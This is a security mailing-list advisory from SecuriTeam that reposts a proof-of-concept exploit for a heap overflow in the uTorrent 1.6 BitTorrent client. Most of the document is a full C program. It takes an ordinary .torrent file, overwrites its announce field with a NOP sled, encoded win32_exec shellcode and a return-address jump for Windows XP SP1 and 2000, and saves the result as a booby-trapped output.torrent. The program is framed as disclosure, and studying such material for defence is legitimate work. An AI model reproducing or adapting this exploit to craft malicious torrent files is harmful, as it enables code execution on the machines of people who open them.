[NT] uTorrent Heap torrent File Overflow (Exploit)



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



uTorrent Heap torrent File Overflow (Exploit)
------------------------------------------------------------------------


SUMMARY

<http://utorrent.com/> uTorrent (miu-Torrent or microTorrent) is a
freeware BitTorrent client for Microsoft Windows written in C++, and
translated into 39 different languages.

A vulnerability in uTorrent allows code execution on the vulnerable system
when a maliciously crafted .torrent files is opened.

DETAILS

Exploit:
/*
* This is a PoC remote exploit for uTorrent 1.6
*
* Author:
* defsec <defacedsecurity@xxxxxxxxxxx>
* http://www.defacedsecurity.com
*
*
* Works on XP SP1 and w2k sp1-4
*
*/

#include <stdio.h>
#include <stdlib.h>

#define NASIZE 4880

unsigned char nice_announce[NASIZE];
unsigned char xorops[]="\x33\xc0\x33\xdb";

// win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum
// Restricted Character 0x00
unsigned char shellcode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x48"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x58"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x38\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x41\x4b\x48"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x36\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x47\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x46\x42\x30\x5a";

//msvcrt.dll pop,pop,ret addr all xp sp1 exchange it with 0x7801D07B for
win2k sp3/sp4
unsigned char jmptosc[] = "\xeb\x04\
\xa7\x2c\xc2\x77\
\x33\xc0\xb0\x11\xc1\xe0\x08\x5b\x5b\x5b\x2b\xd8\xff\xe3";

int main(int argc,char *argv[])
{
FILE * pFile;
long lSize;
char * buffer;
size_t result;

long i = 0;
long j = 0;
long lPtrIndex;
long lHeadSize;
long lTailSize;
char * curptr;
char * alptr;
char * torrentTail;

if (argc < 2)
{
printf("\n[uTorrent 1.6] Heap Overflow Exploit - by
[DEFACEDSECURITY]");
printf("\n\nUsage: ");
printf("%s",argv[0]);
printf(" <TorrentFile>\n");
return 0;
}

pFile = fopen (argv[1],"rb");
if (pFile==NULL)
{
fputs ("File error",stderr);
return 0;
}

// obtain file size:
fseek (pFile ,0,SEEK_END);
lSize = ftell (pFile);
rewind (pFile);

// allocate memory to contain the whole file:
buffer = (char*) malloc (sizeof(char)*lSize);
if (buffer == NULL)
{
fputs ("Memory error",stderr);
return 0;
}

// copy the file into the buffer:
result = fread (buffer,1,lSize,pFile);
if (result != lSize)
{
fputs ("Reading error",stderr);
return 0;
}

fclose (pFile);

/* find announce / announce-list and erase it */
alptr = (char *) strstr(buffer,"announce");
if (alptr == NULL)
{
printf("\ninvalid torrent file");
return 0;
}

curptr = (char *) strstr(alptr, "7:comment");
lHeadSize = curptr - buffer ;
lTailSize = lSize - lHeadSize;

torrentTail = (char *) malloc (sizeof(char)*lTailSize);
memcpy(torrentTail,curptr,lTailSize);

/* generate offending header */
strcpy(nice_announce,"d8:announce4864:");
for (lPtrIndex = 16; lPtrIndex <= 4864+16; lPtrIndex++)
nice_announce[lPtrIndex] = 0x90;
lPtrIndex = 84;
memcpy(nice_announce + lPtrIndex ,xorops,sizeof(xorops)-1);
lPtrIndex += sizeof(xorops) -1;
memcpy(nice_announce+lPtrIndex,shellcode, sizeof(shellcode)-1);
for (lPtrIndex = 4438; lPtrIndex<4458; lPtrIndex++,i++)
nice_announce[lPtrIndex] = jmptosc[i];

/* get head and tail together into a file */
curptr = (char *) malloc(sizeof(char)*(NASIZE+lTailSize));
for (i=0;i<NASIZE;i++)
curptr[i] = nice_announce[i];
for (;i<(NASIZE+lTailSize);i++,j++)
curptr[i] = torrentTail[j];

/* write to file and exit */
pFile = fopen ( "output.torrent" , "wb" );
if (pFile==NULL)
{
fputs ("File error",stderr);
return 0;
}
fwrite(curptr, sizeof(char), (NASIZE+lTailSize), pFile);
fclose (pFile);

return 1337; //:)
}


ADDITIONAL INFORMATION

The information has been provided by milw0rm.
The original article can be found at:
<http://www.milw0rm.com/exploits/3296>
http://www.milw0rm.com/exploits/3296



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [EXPL] Pavuk Digest Authentication Buffer Overflow Exploit
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Authentication Buffer Overflow Vulnerabilities, a buffer overflow ... char *method; ... * the auth_digest pointer, the user pointer, and the buf pointer. ...
    (Securiteam)
  • [NEWS] Ventrilo Denial of Service
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Lack of proper packet handling within Ventrilo allow attackers to crash ... void ventrilo_udp_head_dec(unsigned char *data) ... void ventrilo_udp_data_dec(unsigned char *data, int len, unsigned short ...
    (Securiteam)
  • [EXPL] Microworld Mailscan Password Revealer (Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Employing an array of intelligent filters, MailScan offers ... int main(int argc, char *argv) ...
    (Securiteam)
  • [EXPL] Windows Lsasrv.dll Remote Universal Exploit (MS04-011)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... unsigned char reverseshell[] = ... int num; ... len = recv(sockfd, recvbuf, 1600, 0); ...
    (Securiteam)
  • [EXPL] Internet Explorer VML Buffer Overflow Download Exec (Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... char *url = NULL; ... int size) ...
    (Securiteam)